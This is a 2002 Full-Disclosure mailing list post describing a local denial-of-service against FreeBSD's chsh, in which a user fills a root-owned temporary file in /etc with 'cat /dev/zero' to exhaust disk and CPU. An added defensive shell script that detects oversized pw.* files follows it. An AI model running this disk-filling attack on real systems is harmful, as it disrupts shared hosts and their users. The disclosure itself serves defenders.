From: Charles Stevenson (core_at_bokeoa.com)
Date: Thu Aug 15 2002 - 14:00:38 CDT


    I found an interesting couple of related DoS to do against chsh on
    FBSD. Basically chsh creates a temporary file in /etc and then
    launches a user-defined EDITOR. Anyways I couldn't find a way to
    exploit it but I did find a way to be annoying.

    tty1$ chsh

    even if you just launch vi you can get the name of the temporary file
    it created in /etc or just do ls.

    > ls -l /etc/pw.a1MwaM
    -rw------- 1 core core 330088448 Aug 15 01:44 /etc/pw.a1MwaM

    Er that's after I was being annoying hehehe... filled 60G on phased
    machine. Sorry phased! :D

    tty2$ cat /dev/zero > /etc/pw.a1MwaM

    Then go back to your vi session in chsh and :wq!... The results are
    that basically root can't even remove the file while it's being
    written to and of course lots of cpu overload abounds. Anyways quotas
    will stop this but how many admins put user quotas on filesystems that
    users aren't supposed to be writing to?

      PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND
    14139 core 55 0 1140K 612K RUN 12:55 90.23% 90.23% chsh
    14171 core 30 0 1912K 976K RUN 0:01 7.81% 2.83% top
    13083 root 2 0 356K 0K nfsd 3:00 0.00% 0.00% nfsd

    peace,
    core

    -- 
      Charles Stevenson (core) <corebokeoa.com>
      Lab Assistant, College of Eastern Utah San Juan Campus 
      http://www.bokeoa.com/~core/core.asc
    


    _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
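
A defender-side check for the condition described in the message above, as an added example that is not part of the original post: it lists `pw.*` temporary files in a directory that have grown past a size limit, together with their numeric owner. The function name, the 1 MiB default limit and the use of `find` with `ls -ln` are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: report chsh-style temporary files (pw.*) that have grown
# past a size limit. The pw.* pattern and /etc come from the post; the
# function name and the 1 MiB default limit are assumptions.

# pw_tmp_report [DIR] [MAX_BYTES]
# Prints "uid size path" for each regular file DIR/pw.* larger than MAX_BYTES.
# A non-zero uid on a large file in /etc is the situation the post describes.
pw_tmp_report() {
    dir=${1:-/etc}
    max=${2:-1048576}
    # -size +Nc matches files strictly larger than N bytes.
    find "$dir" -maxdepth 1 -type f -name 'pw.*' -size +"${max}"c 2>/dev/null |
    while IFS= read -r f; do
        # ls -ln prints the numeric owner in field 3 and the size in field 5.
        # A file that vanished between find and ls is skipped silently.
        ls -ln "$f" 2>/dev/null | {
            read -r _mode _links uid _gid size _rest &&
                printf '%s %s %s\n' "$uid" "$size" "$f"
        } || true
    done
}

# When run as a script with arguments, report on the given directory:
#   sh pw_tmp_report.sh /etc 1048576
if [ "$#" -gt 0 ]; then
    pw_tmp_report "$@"
fi
```

Run periodically from cron or a monitoring agent, any line it prints identifies the owning uid to follow up on.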